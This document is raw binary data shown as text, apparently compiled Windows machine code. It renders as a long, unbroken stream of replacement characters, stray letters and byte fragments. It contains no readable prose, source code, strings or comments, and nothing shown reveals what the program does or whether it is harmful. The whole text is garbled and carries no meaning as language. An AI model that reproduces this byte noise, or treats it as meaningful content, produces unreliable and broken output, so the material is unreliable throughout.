ǅL���    م�������f;  ݝD�����T���R��tB ��@���ۅ@���ݝ8���݅D���܅8������+;  ��tB Pم�������;  ݝ0�����d���P��tB ��,���ۅ,���ݝ$���݅0���܅$�������:  ��tB P�)W����rB �M�Q�U�Rj�DtB ����t���P��x���Qj��rB ����T���R��T���P��d���Q��d���Rj��rB ���E�   �$sB �E�   fǅ���� ��e@ �M��<tB ������P�M�Q�UR��d���P�V ��d���Q��tB �����@��f�������M���tB ��d���R��d���Pj��rB ����������t=�E�   j j j j j��T����rB �E�   j j j j j�T����rB �}  �E�   fǅ���� ��e@ �M��<tB ������R�E�P�MQ��d���R� ��d���P��tB 3Ƀ�����f�������M���tB ��d���R��d���Pj��rB ����������t=�E�   j j j j j�T����rB �E�   j j j j j��S����rB �   �E�   fǅ���� ��e@ �M��<tB ������R�E�P�MQ��d���R�� ��d���P��tB 3Ƀ�����f�������M���tB ��d���R��d���Pj��rB ����������t8�E�   j j j j j �SS����rB �E�   j j j j j@�7S����rB �E�   �$sB �E�   �U�R�E�P�dT����rB ��  �E�   �Mf�y@��  �E�   �U�BB����  �E�   �Mf�AB �E�   �U��MQ��  P��x���R�sB ������j��������������R�Q\������������ }#j\he@ ������P������Q� sB �� ����
ǅ ���    ��x�����tB �E�    �U�R��S����rB �E�!   �E��E��E�"   �M��M��E�#   �U��MQ��  P��x���R�sB ������������P�������������P�Rp������������ }#jph@J@ ������Q������R� sB ������
ǅ���    fǅ���� ��e@ �M��<tB ������P�M�Q�UR��d���P� fǅ���� ��e@ �M��<tB ������Q�U�R�EP��T���Q�Q �U��MQ��  P��t���R�sB ������������P�������������P�Rx������������ }#jxh@J@ ������Q������R� sB ������
ǅ���    م��������5  ݝ�����T���P��tB �����ۅ���ݝ���݅���܅������f5  ��tB Pم�������O5  ݝ������d���Q��tB ������ۅ����ݝ����݅����܅�������5  ��tB P�dQ����rB �U�R�E�Pj�DtB ����t���Q��x���Rj��rB ����T���P��T���Q��d���R��d���Pj��rB ���E�$   �$sB �E�%   fǅ���� ��e@ �M��<tB ������Q�U�R�EP��d���Q� ��d���R��tB �����@��f�������M���tB ��d���P��d���Qj��rB ����������t=�E�&   j j j j j�O����rB �E�'   j j j j j��N����rB �}  �E�(   fǅ���� ��e@ �M��<tB ������P�M�Q�UR��d���P�� ��d���Q��tB 3҃�����f�������M���tB ��d���P��d���Qj��rB ����������t=�E�)   j j j j j�ON����rB �E�*   j j j j j�3N����rB �   �E�+   fǅ���� ��e@ �M��<tB ������P�M�Q�UR��d���P� ��d���Q��tB 3҃�����f�������M���tB ��d���P��d���Qj��rB ����������t8�E�,   j j j j j �M����rB �E�-   j j j j j@�rM����rB �E�/   �$sB �E�0   �E�P�M�Q�N����rB �S  �E�3   fǅ����  ��D@ �M��<tB ��e@ �M��<tB ������R�E�P�M�Q� ��l���ǅd����  ������R��d���P�|sB f�������M�Q�U�Rj�DtB ����d�����rB ����������   �E�4   fǅ���� ��e@ �M��<tB ������Q�U�R�EP��d���Q� ��d���R�dtB P��T���P��sB ǅL��� �ǅD���
   ��D���Q��T���R�E�P� tB P�(sB �M�Q�U�Rj�DtB ����D���P��T���Q��d���Rj��rB ����/  �E�6   fǅ����  ��D@ �M��<tB ��e@ �M��<tB ������P�M�Q�U�R�( ��l���ǅd����  ������P��d���Q�|sB f�������U�R�E�Pj�DtB ����d�����rB ����������   �E�7   �U�P��rB ��l���ǅd���   �M�����ǅ���@  ��d���Rj	�����P��T���Q�TsB ǅL��� �ǅD���
   ��D���R��T���P�M�Q� tB P�(sB �M���tB ��D���R��T���P��d���Qj��rB ���.  �E�8   fǅ����  ��D@ �M��<tB ��e@ �M��<tB ������R�E�P�M�Q�� ��l���ǅd����  ������R��d���P�|sB f�������M�Q�U�Rj�DtB ����d�����rB ���������Q  �E�9   fǅ���� ��e@ �M��<tB ������Q�U�R�EP��d���Q�� ǅ���    ǅ����  ��d���R��T���P�0tB P�����Q�|sB f�������M���tB ��d�����rB ��������t�E�:   �Ef�@@  �E�<   fǅ���� ��e@ �M��<tB ������Q�U�R�EP��d���Q�C ǅ���   ǅ����  ��d���R��T���P�0tB P�����Q�|sB f�������M���tB ��d�����rB ��������t�E�=   �Ef�@@ �,  �E�?   fǅ����  ��D@ �M��<tB �f@ �M��<tB ������Q�U�R�E�P��  ��l���ǅd����  ������Q��d���R�|sB f�������E�P�M�Qj�DtB ����d�����rB ����������  �E�@   �E�HZ����  �E�A   fǅ����  ��D@ �M��<tB �|d@ �M��<tB ������R�E�P�M�Q�B  �ЍM���tB fǅ����  �U��������E�    �������M���tB ������P�M�Q�U��MQ���  ������������ }#h�  h�D@ �UR������P� sB �������
ǅ����    �M�Q�U�R�E�P�M�Qj�DtB ���E�B   fǅ���� ��d@ �M��<tB ������R�E�P�M��EP���  ������������ }#h�  h�D@ �MQ������R� sB �������
ǅ����    �M���tB �E�C   �=�KB  uh�KB hDN@ �(tB ǅ�����KB �
ǅ�����KB ��������������UR��x���P�sB P�������������P�R������������ }#jh4N@ ������Q������R� sB �������
ǅ����    ��x�����tB �E�D   �=�KB  uh�KB hDN@ �(tB ǅ�����KB �
ǅ�����KB ��������������=�@B  uh�@B h�+@ �(tB ǅ�����@B �
ǅ�����@B �������P��x���Q�sB P�������������Q�P������������ }#jh4N@ ������R������P� sB �������
ǅ����    ��x�����tB �E�E   �=�KB  uh�KB hDN@ �(tB ǅ�����KB �
ǅ�����KB ��������������=�@B  uh�@B hL7@ �(tB ǅ�����@B �
ǅ�����@B �������Q��x���R�sB P�������������R�Q������������ }#jh4N@ ������P������Q� sB �������
ǅ����    ��x�����tB � (  �E�G   fǅ����  ��D@ �M��<tB ��f@ �M��<tB ������R�E�P�M�Q�d�  ��l���ǅd����  ������R��d���P�|sB f�������M�Q�U�Rj�DtB ����d�����rB ��������tW�E�H   �M��EP��  ������������ }#h  h�D@ �MQ������R� sB �������
ǅ����    �4'  �E�I   fǅ����  ��D@ �M��<tB ��f@ �M��<tB ������P�M�Q�U�R�x�  ��l���ǅd����  ������P��d���Q�|sB f�������U�R�E�Pj�DtB ����d�����rB ����������   �E�J   fǅ����  ��f@ �M��<tB ������R�E�P�M��EP���  ������������ }#h�  h�D@ �MQ������R� sB �������
ǅ����    �M���tB �&  �E�K   fǅ����  ��D@ �M��<tB ��f@ �M��<tB ������P�M�Q�U�R�]�  ��l���ǅd����  ������P��d���Q�|sB f�������U�R�E�Pj�DtB ����d�����rB ���������#  �E�L   �=�@B  uh�@B hL7@ �(tB ǅ�����@B �
ǅ�����@B �������������ǅ��� �ǅ���
   ǅ��� �ǅ���
   �   �����̋�����������A������Q������A�   �����̋�����������A������Q�� ����A�������������P���  ������������ }&h�  hf@ ������Q������R� sB �������
ǅ����    �]$  �E�M   fǅ����  ��D@ �M��<tB �g@ �M��<tB ������P�M�Q�U�R��  ��l���ǅd����  ������P��d���Q�|sB f�������U�R�E�Pj�DtB ����d�����rB ����������   �E�N   fǅ����  ��D@ �M��<tB �$g@ �M��<tB ������R�E�P�M�Q��  �ЍM���tB P�8@B R��rB ��l���ǅd���   ��d���P�L@B Q�>  �U�R�E�P�M�Qj�DtB ����d�����rB � #  �E�O   fǅ����  ��D@ �M��<tB �<g@ �M��<tB ������R�E�P�M�Q�d�  ��l���ǅd����  ������R��d���P�|sB f�������M�Q�U�Rj�DtB ����d�����rB ����������   �E�P   fǅ����  ��D@ �M��<tB �Tg@ �M��<tB ������Q�U�R�E�P���  �ЍM���tB fǅ����  �M��������E�    �������M���tB ������R�E�P�M��EP���  ������������ }#h�  h�D@ �MQ������R� sB �������
ǅ����    �E�P�M�Q�U�R�E�Pj�DtB ���!  �E�Q   fǅ����  ��D@ �M��<tB �`g@ �M��<tB ������Q�U�R�E�P���  ��l���ǅd����  ������Q��d���R�|sB f�������E�P�M�Qj�DtB ����d�����rB ���������1  �E�R   �=�KB  uh�KB hDN@ �(tB ǅ�����KB �
ǅ�����KB ���������������x���R�������������R�Q������������ }#jh4N@ ������P������Q� sB �������
ǅ����    ��x����������E�P�������������P�RP������������ }#jPhtV@ ������Q������R� sB �������
ǅ����    fǅ����  ��D@ �M��<tB �xg@ �M��<tB �E�P������Q�U�R�E�P�U�  �ЍM���tB P��rB ��l���ǅd���   ��d���Q�psB �U�R�E�P�M�Q�U�Rj�DtB ����x�����tB ��d�����rB �E�S   �=�KB  uh�KB hDN@ �(tB ǅ�����KB �
ǅ�����KB ���������������x���R�������������R�Q������������ }#jh4N@ ������P������Q� sB �������
ǅ����    ��x����������E�P�������������P�RP������������ }#jPhtV@ ������Q������R� sB �������
ǅ����    fǅ����  ��D@ �M��<tB ��g@ �M��<tB �E�P������Q�U�R�E�P��  �ЍM���tB P��rB ��l���ǅd���   ��d���Q�psB �U�R�E�P�M�Q�U�Rj�DtB ����x�����tB ��d�����rB ��  �E�T   fǅ����  ��D@ �M��<tB ��g@ �M��<tB ������P�M�Q�U�R��  ��l���ǅd����  ������P��d���Q�|sB f�������U�R�E�Pj�DtB ����d�����rB ����������  �E�U   �Uf�BZ �E�V   fǅ����  ��D@ �M��<tB ��g@ �M��<tB ������P�M�Q�U�R�o�  �ЍM���tB fǅ����  �E��������E�    �������M���tB ������Q�U�R�E��UR���  ������������ }#h�  h�D@ �EP������Q� sB �������
ǅ����    �U�R�E�P�M�Q�U�Rj�DtB ���E�W   fǅ���� ��d@ �M��<tB ������P�M�Q�U��MQ���  ������������ }#h�  h�D@ �UR������P� sB �������
ǅ����    �M���tB �E�X   �=�KB  uh�KB hDN@ �(tB ǅ�����KB �
ǅ�����KB ��������������EP��x���Q�sB P�������������Q�P������������ }#jh4N@ ������R������P� sB �������
ǅ����    ��x�����tB �E�Y   �=�KB  uh�KB hDN@ �(tB ǅ�����KB �
ǅ�����KB ��������������=�@B  uh�@B h�+@ �(tB ǅ�����@B �
ǅ�����@B �������Q��x���R�sB P�������������R�Q������������ }#jh4N@ ������P������Q� sB �������
ǅ����    ��x�����tB �E�Z   �=�KB  uh�KB hDN@ �(tB ǅ|����KB �
ǅ|����KB ��|�����������=�@B  uh�@B hL7@ �(tB ǅx����@B �
ǅx����@B ��x����R��x���P�sB P�������������P�R������������ }#jh4N@ ������Q������R� sB ��t����
ǅt���    ��x�����tB �M  �E�[   fǅ����  ��D@ �M��<tB ��g@ �M��<tB ������P�M�Q�U�R��  ��l���ǅd����  ������P��d���Q�|sB f�������U�R�E�Pj�DtB ����d�����rB ���������  �E�\   j&�	 �ЍM���tB fǅ����  ��D@ �M��<tB ��h@ �M��<tB ������R�E�P�M�Q���  �ЍM���tB �U��������E�    �E��������E�    h�g@ �������M���tB P��rB �ЍM���tB P�������M���tB P��rB ��l���ǅd���   j��d���Q��sB ݝ�����U�R�E�P�M�Q�U�R�E�P�M�Q�U�Rj�DtB �� ��d�����rB �  �E�]   fǅ����  ��D@ �M��<tB �0i@ �M��<tB ������P�M�Q�U�R���  ��l���ǅd����  ������P��d���Q�|sB f�������U�R�E�Pj�DtB ����d�����rB ����������  �E�^   �=�KB  uh�KB hDN@ �(tB ǅp����KB �
ǅp����KB ��p������������x���Q�������������Q�P������������ }#jh4N@ ������R������P� sB ��l����
ǅl���    ��x����������U�R�������������R�QP������������ }#jPhtV@ ������P������Q� sB ��h����
ǅh���    fǅ����  ��D@ �M��<tB �Hi@ �M��<tB ������R�E�P�M�Q�X�  �ЍM���tB �U��������E�    �E�P�������M���tB P��rB �ЍM���tB Pjj�j�tB �M�Q�U�R�E�P�M�Q�U�R�E�Pj�DtB ����x�����tB �E�_   fǅ����  ��D@ �M��<tB h`i@ h�g@ ��rB �ЍM���tB Ph�i@ ��rB �ЍM���tB ������Q�U�R�E�P�x�  �ЍM���tB �=�KB  uh�KB hDN@ �(tB ǅd����KB �
ǅd����KB ��d������������x���P�������������P�R������������ }#jh4N@ ������Q������R� sB ��`����
ǅ`���    ��x����������M�Q�������������Q�PP������������ }#jPhtV@ ������R������P� sB ��\����
ǅ\���    fǅ����  ��D@ �M��<tB ��i@ �M��<tB ������Q�U�R�E�P�D�  �Ѝ�|�����tB �M���|����E�    ��|�����x���ǅ|���    ��|����M���tB Ph�g@ ��rB �ЍM���tB P�E�P��rB �ЍM���tB P��x����M���tB P��rB �ЍM���tB Ph�g@ ��rB �ЍM���tB Pjh�i@ ��sB ����|���Q�U�R�E�P�M�Q�U�R�E�P�M�Q�U�R�E�P�M�Q�U�R�E�P�M�Q�U�Rj�DtB ��<��x�����tB �E�`   fǅ����  ��D@ �M��<tB ��i@ �M��<tB ������P�M�Q�U�R���  �ЍM���tB �E���t����E�    ��t����M���tB Pjh�i@ ��sB ���M�Q�U�R�E�P�M�Qj�DtB ���E�a   j�`sB �E�b   �U��MQ��   P��x���R�sB ������j��������������R�Q\������������ }#j\he@ ������P������Q� sB ��X����
ǅX���    ��x�����tB �  �E�c   fǅ����  ��D@ �M��<tB ��i@ �M��<tB ������R�E�P�M�Q���  ��l���ǅd����  ������R��d���P�|sB f�������M�Q�U�Rj�DtB ����d�����rB ����������	  �E�d   �=�KB  uh�KB hDN@ �(tB ǅT����KB �
ǅT����KB ��T������������x���P�������������P�R������������ }#jh4N@ ������Q������R� sB ��P����
ǅP���    ��x����������M�Q�������������Q�PP������������ }#jPhtV@ ������R������P� sB ��L����
ǅL���    fǅ����  ��D@ �M��<tB ��i@ �M��<tB ������Q�U�R�E�P�?�  �ЍM���tB �M���p����E�    �U�R��p����M���tB P��rB ��l���ǅd���   j ��d���P��sB ݝ�����M�Q�U�R�E�P�M�Q�U�Rj�DtB ����x�����tB ��d�����rB �E�e   �=�KB  uh�KB hDN@ �(tB ǅH����KB �
ǅH����KB ��H������������x���R�������������R�Q������������ }#jh4N@ ������P������Q� sB ��D����
ǅD���    ��x����������E�P�������������P�RP������������ }#jPhtV@ ������Q������R� sB ��@����
ǅ@���    fǅ����  ��D@ �M��<tB �Lj@ �M��<tB ������P�M�Q�U�R�~�  �ЍM���tB �E���l����E�    �M�Q��l����M���tB P��rB ��l���ǅd���   j ��d���R��sB ݝ�����E�P�M�Q�U�R�E�P�M�Qj�DtB ����x�����tB ��d�����rB �E�f   �=�KB  uh�KB hDN@ �(tB ǅ<����KB �
ǅ<����KB ��<������������x���Q�������������Q�P������������ }#jh4N@ ������R������P� sB ��8����
ǅ8���    ��x����������U�R�������������R�QP������������ }#jPhtV@ ������P������Q� sB ��4����
ǅ4���    fǅ����  ��D@ �M��<tB ��j@ �M��<tB ������R�E�P�M�Q��  �ЍM���tB �U���h����E�    �E�P��h����M���tB P��rB ��l���ǅd���   j ��d���Q��sB ݝ�����U�R�E�P�M�Q�U�R�E�Pj�DtB ����x�����tB ��d�����rB �E�g   �=�KB  uh�KB hDN@ �(tB ǅ0����KB �
ǅ0����KB ��0������������x���P�������������P�R������������ }#jh4N@ ������Q������R� sB ��,����
ǅ,���    ��x����������M�Q�������������Q�PP������������ }#jPhtV@ ������R������P� sB ��(����
ǅ(���    fǅ����  ��D@ �M��<tB h�j@ h�g@ ��rB �ЍM���tB PhTk@ ��rB �ЍM���tB ������Q�U�R�E�P���  �ЍM���tB �M���d����E�    �U�R��d����M���tB P��rB ��l���ǅd���   j ��d���P��sB ݝ�����M�Q�U�R�E�P�M�Q�U�R�E�Pj�DtB ����x�����tB ��d�����rB �E�h   �=�KB  uh�KB hDN@ �(tB ǅ$����KB �
ǅ$����KB ��$������������x���P�������������P�R������������ }#jh4N@ ������Q������R� sB �� ����
ǅ ���    ��x����������M�Q�������������Q�PP������������ }#jPhtV@ ������R������P� sB ������
ǅ���    fǅ����  ��D@ �M��<tB h�k@ h�g@ ��rB �ЍM���tB Ph�k@ ��rB �ЍM���tB ������Q�U�R�E�P���  �ЍM���tB �M���`����E�    �U�R��`����M���tB P��rB ��l���ǅd���   j ��d���P��sB ݝ�����M�Q�U�R�E�P�M�Q�U�R�E�Pj�DtB ����x�����tB ��d�����rB �E�i   �M��EP���  P��x���Q�sB ������j��������������Q�P\������������ }#j\he@ ������R������P� sB ������
ǅ���    ��x�����tB �K  �E�j   fǅ����  ��D@ �M��<tB � l@ �M��<tB ������Q�U�R�E�P��  ��l���ǅd����  ������Q��d���R�|sB f�������E�P�M�Qj�DtB ����d�����rB ����������  �E�k   �=�KB  uh�KB hDN@ �(tB ǅ����KB �
ǅ����KB ��������������x���R�������������R�Q������������ }#jh4N@ ������P������Q� sB ������
ǅ���    ��x����������E�P�������������P�RP������������ }#jPhtV@ ������Q������R� sB ������
ǅ���    fǅ����  ��D@ �M��<tB hl@ h�g@ ��rB �ЍM���tB Ph0l@ ��rB �ЍM���tB ������P�M�Q�U�R���  �ЍM���tB �E���\����E�    �M�Q��\����M���tB P��rB ��l���ǅd���   j ��d���R��sB ݝ�����E�P�M�Q�U�R�E�P�M�Q�U�Rj�DtB ����x�����tB ��d�����rB ��  �E�l   fǅ����  ��D@ �M��<tB �Ll@ �M��<tB ������P�M�Q�U�R��  ��l���ǅd����  ������P��d���Q�|sB f�������U�R�E�Pj�DtB ����d�����rB ��������tm�E�m   fǅ���� �dl@ �M��<tB ������R�E�P�MQ��d���R��  ��d���P��rB �й<@B ��tB �M���tB ��d�����rB ��  �E�n   fǅ����  ��D@ �M��<tB �ll@ �M��<tB ������Q�U�R�E�P��  ��l���ǅd����  ������Q��d���R�|sB f�������E�P�M�Qj�DtB ����d�����rB ���������)  �E�o   fǅ���� �dl@ �M��<tB ������P�M�Q�UR��d���P��  ǅ����l@ ǅ����  ��d���Q�����R�|sB f�������M���tB ��d�����rB ����������  �E�p   j&��  �ЍM���tB fǅ����  ��D@ �M��<tB ��l@ �M��<tB ������Q�U�R�E�P���  �ЍM���tB fǅ���� �dl@ �M��<tB ������Q�U�R�EP��d���Q�2�  ��d���R��T���P�4sB ��T���Q��D���R�LsB �E���X����E�    �M���T����E�    h�g@ ��X����M���tB P��rB �ЍM���tB P��T����M���tB P��rB ��<���ǅ4���   j��4���R��D���P��$���Q�ltB P��sB ݝ�����U�R�E�P�M�Q�U�R�E�P�M�Q�U�R�E�Pj�DtB ��$��$���Q��D���R��4���P��T���Q��d���Rj��rB ����   �E�r   ������P�M��EP�RX������������ } jXh�D@ �MQ������R� sB ������
ǅ���    fǅ���� �dl@ �M��<tB ������P�M�Q�UR��d���P��  jj j ��d���Q�U�R� tB P�E�P�ttB Ph�l@ �M�Q�ttB P������R������rB �E�P�M�Q�U�R�E�Pj�DtB ����d�����rB �hv+A �   ��|���Q�U�R�E�P�M�Q�U�R�E�P�M�Q�U�R�E�P�M�Q�U�R�E�P�M�Q�U�Rj�DtB ��<��t���P��x���Qj��rB ����$���R��4���P��D���Q��T���R��d���Pj��rB ��Í�����Q������Rj��rB ���E�Pj �sB �M���tB �M���tB �M���tB ËM��EP�R�E��M�d�    _^[��]� ��������U���h�@ d�    Pd�%    �l   �����SVW�e��E�@ �E���E��M����M�E�    �U��MQ�P�E�   �E�   j��sB �E�   �=�KB  uh�KB hDN@ �(tB �E��KB ��E��KB �U���E��M�Q�U���M�Q�P�E��}� }jh4N@ �U�R�E�P� sB ��|����
ǅ|���    �MȉM��U�R�E���U�R�QP�E��}� }jPhtV@ �E�P�M�Q� sB ��x����
ǅx���    f�E�  ��D@ �M��<tB h�l@ h�g@ ��rB �ЍM���tB �U�R�E�P�M�Q��  �ЍM���tB �ỦU��E�    �E�P�U��M���tB P��rB �E��E�   j �M�Q��sB �]��U�R�E�P�M�Q�U�R�E�Pj�DtB ���M���tB �M���rB �E�   �M��EP���  P�M�Q�sB �E�j �U���M�Q�P\�E��}� }j\he@ �U�R�E�P� sB ��t����
ǅt���    �M���tB �E�    �h/.A �2�M�Q�U�R�E�P�M�Q�U�Rj�DtB ���M���tB �M���rB �ËE��UR�Q�E��M�d�    _^[��]� ���������������U���h�@ d�    Pd�%    �H   ����SVW�e��E��@ �E�    �E�    �E��UR�Q�E�   �E�     �E�   j��sB �E�   �M�Rjj�j �tB �E�   j�,tB P�E�P�\sB �M�Q��rB �ЍM���tB �M���rB �E�   j�U�Rj �tsB �E�   j�`sB �E�   �ẺE��E�   �U��M���tB h�/A ��M�����t	�M���rB �M���rB ÍM���tB ËU��MQ�P�U�EЉ�MԉJ�E؉B�M܉J�E��M�d�    _^[��]� ��������U���h�@ d�    Pd�%    �t  ����SVW�e��E�0@ �E���E��M����M�E�    �U��MQ�P�E�   �E�   j��sB �E�   �U�B\����  �E�   �=�KB  uh�KB hDN@ �(tB ǅ�����KB �
ǅ�����KB ��������������E�P�������������P�R������������ }#jh4N@ ������Q������R� sB �������
ǅ����    �E��������M�Q�������������Q�PP������������ }#jPhtV@ ������R������P� sB �������
ǅ����    fǅ����  ��D@ �M��<tB �Hi@ �M��<tB ������Q�U�R�E�P��  �ЍM���tB �Mȉ������E�    �U�R�������M���tB P��rB �E��E�   j �E�P��sB ݝ�����M�Q�U�R�E�P�M�Q�U�Rj�DtB ���M���tB �M���rB �E�   �Ef�@\ �`  �E�   �Mf�y\�K  �E�   �=�KB  uh�KB hDN@ �(tB ǅ�����KB �
ǅ�����KB ��������������M�Q�������������Q�P������������ }#jh4N@ ������R������P� sB �������
ǅ����    �M��������U�R�������������R�QP������������ }#jPhtV@ ������P������Q� sB �������
ǅ����    fǅ����  ��D@ �M��<tB ��i@ �M��<tB ������R�E�P�M�Q���  �ЍM���tB �=�KB  uh�KB hDN@ �(tB ǅ�����KB �
ǅ�����KB ��������������M�Q�������������Q�P������������ }#jh4N@ ������R������P� sB ��|����
ǅ|���    �M��������U�R�������������R�QP������������ }#jPhtV@ ������P������Q� sB ��x����
ǅx���    fǅ����  ��D@ �M��<tB �m@ �M��<tB ������R�E�P�M�Q��  �ЍM���tB �U��������E�    �E�P�������M���tB P��rB �ЍM���tB �M�Q�U�R�E��UR��  ������������ }#h  h�D@ �EP������Q� sB ��t����
ǅt���    ǅ,���Hk@ ǅ$���   ǅ���Hk@ ǅ���   �U��������E�    �E�P�������M���tB P��rB �ЍM���tB ��d���Q�U�R�E��UR��  ������������ }#h  h�D@ �EP������Q� sB ��p����
ǅp���    ǅ���Hk@ ǅ���   ǅ����Hk@ ǅ����   �U�R��$���P�M�Q�ltB P�����R��t���P�ltB P��d���Q��T���R�ltB P�����P��D���Q�ltB P������R��4���P�ltB P��rB �ЍM���tB �M�Q�U�R�E�P�M�Q�U�R�E�P�M�Q�U�R�E�P�M�Q�U�R�E�Pj�DtB ��4�M�Q�U�Rj��rB ����4���P��D���Q��T���R��d���P��t���Q�U�R�E�Pj��rB �� �E�   fǅ����  ��D@ �M��<tB �4m@ �M��<tB fǅ����  ��D@ �M��<tB �\e@ �M��<tB ������Q�U�R�E�P���  �ЍM���tB P�M�Q��rB �ЍM���tB P������R�E�P�M�Q��  �ЍM���tB P��rB �E��E�   �U�R�L@B P�^  �M�Q�U�R�E�P�M�Q�U�R�E�P�M�Qj�DtB �� �M���rB �E�	   �U��MQ��   P�U�R�sB ������j �������������R�Q\������������ }#j\he@ ������P������Q� sB ��l����
ǅl���    �M���tB �E�
   �Uf�B\  �E�    �h9A �   �E�P�M�Q�U�R�E�P�M�Q�U�R�E�P�M�Q�U�R�E�P�M�Q�U�Rj�DtB ��4�E�P�M�Qj��rB ����4���R��D���P��T���Q��d���R��t���P�M�Q�U�Rj��rB �� ÍM���tB ËE��UR�Q�E��M�d�    _^[��]� �����������Q�D$V�T$�D$    �0RV��QX��}jXh�[@ VP� sB �D$h :A j�P�%������rB �5P@B ^Y� ��������������Q�P@B �D$     ��t>�D$V�T$�0RV��QX��}jXh�[@ VP� sB �P@B �L$Pj�Q�����rB ^Y� ������������U���h�@ d�    Pd�%    ��3�S�E�E܋EVW=  �e��E��@ u!�E�MP�U�QR�d   �M���rB h�:A �5�M�UQ�P@B RP�EPQ�o������rB �u�h�:A �
�M���rB �ËM��E�_^d�    [��]� ��������U���h�@ d�    Pd�%    ��l�ESV3�HW���e��E��@ �u�u��uЉủuȉu��u���   3Ɋ��=A �$��=A �=�tB ��tB �3��U��E�Rh   P�u��E�   ��sB �M�Q��rB �ЍM��׍U��E�RPj��rB �M���VQ��rB �U�P�E�RP�ttB �MPQ�������rB �U̍E�RP��sB �M��Ӆ�~1�M�U�QVR�|tB �ЍM���P��rB �ЍM��׍M��Ӆ��I����E�P��rB ���S  �M�Q�  h�=A �|  95�KB uh�KB hDN@ �(tB �@B �=�KB ;�uh@B h�:@ �(tB �@B ��E�RP�sB PW�S;�}jh4N@ WP� sB �M���tB 95�KB uh�KB hDN@ �(tB ��@B �=�KB ;�uh�@B hL7@ �(tB ��@B ��U�QR�sB PW�S;�}jh4N@ WP� sB �M���tB 95�KB uh�KB hDN@ �(tB ��@B �=�KB ;�uh�@B h�+@ �(tB ��@B ��M�PQ�sB PW�S;�}jh4N@ WP� sB �M���tB h�=A �5�E�t	�M���rB �M���tB �M���tB �U��E�RPj��rB ��Ë5�tB �M��֍M���ËE�UЋ�_^[��UԉQ�U؉Q�U܉Q�M�d�    ��]� ��;A 6=A 6=A 6=A 6=A �;A  �����@B V��uh@B h�:@ �(tB �5@B �L$QV���  ��}h  h�D@ VP� sB ^� ��������U���h�@ d�    Pd�%    ��dSVW�   3��}��3ɋU�5<tB �M��ẺE��E��E��E��M��E��M��E��M��M̉e��E��@ �E��ֺ`p@ �|@B �֍U�h`@B Rj��rB �Ef�E� P�c���=�rB ���׃��f�u�f;�u�]�h�@A ��  �M�Q�  ;ÉE�u�]�h�@A �  �U�R�-�����׋E�P�  �5�tB �ЍM���Pho@ ��rB �ЍM���PS��rB �ЍM���P��rB �M���֍M��U�Q�E�RPj�DtB ��jjj������ׅ�}�E�����h�@A �  j jV�B  �����   �M��f��tu�U�j�E�RPh$O@ ��sB PV�������׍M��U�QRh$O@ ��rB ����   �Ej3h  PV�+�����ׅ���   ��~vV�y�����E�����h�@A �   �Mj3h  QV�������ׅ�u8�U�j�E�RPh$O@ ��sB PV�i�����׍M��U�QRh$O@ ��rB ���t��~V������E�����h�@A �"�u�h�@A ��E��M�P�U�QRj�DtB ��ÍM��%�tB ËM��E�_^d�    [��]� ���������������f�D$f�L$SV�t$W�T$jR3�h�   h��  �\$ V�\$ f�D$$f�L$&�u���=�rB �D$��9\$u*�D$�L$PQh�   h��  V�D$    �e������;�t���_��^[��� �������VW����=�rB ���ׅ�t�b����������_f��@B   ^ÐU���h�@ d�    Pd�%    �`   ����SVW�e��E�@ �E�    �E�    �E�   �E�   j��sB �E�   �E�    �E�   �E�Pj �M�Q��sB �U�R��rB �ЍM���tB �E�P�M�Qj��rB ���E�   �UR�O���E���rB �E��E��E�   �}� u�E�   ��o@ �M��<tB �  �E�	   �M�Q�9���E���rB �U��U��E�
   �}� ~�E�   �E�    �E�   �E�P�M�Q�U�R�E�P�ttB P�$����rB �M�Q�U�R��sB �M���tB �E�   �E܉E��E�@  �M�Q�U�R�E�P��tB �M�Q��rB �ЍM���tB �M���rB �E�   �U܍M��<tB �E�   �XtB �E��E�	   �U�R�8sB f�E��M���rB �E���t�E�   ��o@ �M��<tB h�CA �0�M�����t	�M���tB �M���tB �U�R�E�Pj��rB ��ÍM���tB ËEЋM�d�    _^[��]� ������U���h�@ d�    Pd�%    �T   �]���SVW�e��E� @ �E�    �E�    �E�   �U�M��<tB �E�   j��sB �E�   �E�P�M�Q�ttB P�����E���rB �U�R�E�P��sB �M��M��M���tB �E�   �}����   �E�   �U�R�E�P�ttB P����E���rB �M�Q�U�R��sB �E��E̍M���tB �E�   �}� tY�E�   j�M�Q�U�R�� ����rB �E�   j�E�P�M�Q�� ����rB �E�	   �U�R�E�P�M�Q� ����rB ��E�   �E������E�   �U��U��E�   �XtB �E��E�	   �E�P�8sB f�E��M���rB �M���t�E�   �E�����h�EA ��M���tB �M���rB ÍM���tB ËEċM�d�    _^[��]� ��������������U���h�@ d�    Pd�%    ��DSV3�W�=�sB �E�E�E�E��EЉẺE��e��E�h`p@ P�E��@ �׋�rB �M̍U�QR�ӋuV��sB ��t(=   �֍M��L  ��rB P��rB �ЍM���tB h�   �E�VP��rB �M�Q��rB �ЍM���tB �M���rB �U�E�RP�׍M̍U�QR�ӋE�=�sB Pj�׃����   �M�U�QR�htB �E���tf�8u�p�H��;�r�hsB ��hsB ���E�j Pj�׋M��Qj��sB �U�+��M�B��   ����   �WPQ�������rB �U�R��tB �u�h�GA � �E�P��tB �M���rB �M�Qj �sB ÍM���tB �U�Rj �sB ËM��E�_^d�    [��]� ��rB P��tB �ЍM���tB �U�E�RP�׍M̍U�QR��������tB ���������������  ��   3�f9�@B VW��$�  �d   �|$���   ��$�  �L$PQh<O@ ��sB Ph  �������rB �T$��$�  RPh<O@ ��rB �օ�t<��$�  f��@B ��Qh  �0sB �Ћ�$�  ��tB f��@B _^�Ġ  � f��@B   f��@B _^�Ġ  � �U���h�@ d�    Pd�%    ��@f��@B SVW�=�tB 3��   �e��E��@ �E�E��E܉E؉EԉE�f�M��]�f;]��&  9�KB uh�KB hDN@ �(tB �5�KB �E�PV��R��}jh4N@ VP� sB �EЍU�RP����QX��}jXhtV@ VP� sB �E܋5�rB Ph�r@ �֋ЍM���PS��rB �ЍM���P�֋ЍM��׍MԍU�Q�E�RPj�DtB ���M���tB �M�U�QR�ttB Pj j �B(������rB �E܍M�PQ��sB �M���tB ��t j V�[(������rB ��t#V�(����rB �   fE�pY��3��]�������U�U�h�JA �!�EԍM�P�U�QRj�DtB ���M���tB ÍM��%�tB ËM�f�E�_^d�    [��]��tB �������������SV�t$3ۋF<;�t1�N4W�=�rB ;�t�N8QP�����׋V4R�
